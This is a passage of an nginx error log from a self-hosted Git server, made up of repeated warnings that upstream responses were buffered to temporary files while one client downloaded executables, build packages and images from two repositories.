response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000015134 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" +2026/02/17 17:07:10 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000015135 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" +2026/02/17 17:07:47 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000015136 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" +2026/02/17 17:10:01 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000015137 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 17:11:58 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000015138 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" +2026/02/17 17:15:43 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000015139 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" +2026/02/17 17:16:09 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000015140 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" +2026/02/17 17:17:52 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000015141 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +2026/02/17 17:17:55 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000015142 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +2026/02/17 17:17:58 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000015143 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +2026/02/17 17:18:01 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000015144 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +2026/02/17 17:18:04 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000015145 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +2026/02/17 17:18:06 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000015146 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +2026/02/17 17:18:12 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000015147 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +2026/02/17 17:18:23 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000015148 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +2026/02/17 17:18:28 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000015149 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +2026/02/17 17:21:24 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000015150 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" +2026/02/17 17:23:17 [warn] 923#923: *73870 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000015151 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" +2026/02/17 17:23:35 [warn] 923#923: *73870 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000015152 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" +2026/02/17 17:32:15 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000015153 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 17:32:22 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000015154 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 17:32:31 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000015155 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" +2026/02/17 17:32:34 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000015156 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 17:35:58 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000015157 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" +2026/02/17 17:37:40 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000015158 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 17:40:39 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000015159 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +2026/02/17 17:40:42 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000015160 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +2026/02/17 17:40:54 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000015161 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" +2026/02/17 18:08:18 [warn] 931#931: *78190 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000015162 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" +2026/02/17 18:11:45 [warn] 931#931: *78190 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000015163 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +2026/02/17 18:15:28 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000015164 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" +2026/02/17 18:15:32 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000015165 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" +2026/02/17 18:17:27 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000015166 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 18:23:06 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000015167 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" +2026/02/17 18:23:09 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000015168 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +2026/02/17 18:26:16 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000015169 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +2026/02/17 18:26:43 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000015170 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +2026/02/17 18:27:28 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000015171 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +2026/02/17 18:27:30 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000015172 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +2026/02/17 18:32:01 [warn] 934#934: *81220 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000015173 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" +2026/02/17 18:32:45 [warn] 934#934: *81220 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000015174 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +2026/02/17 18:49:25 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/91/0000015918 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" +2026/02/17 18:49:58 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/91/0000015919 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +2026/02/17 18:50:40 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/92/0000015920 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +2026/02/17 18:50:49 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/92/0000015921 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +2026/02/17 18:50:51 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/92/0000015922 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: 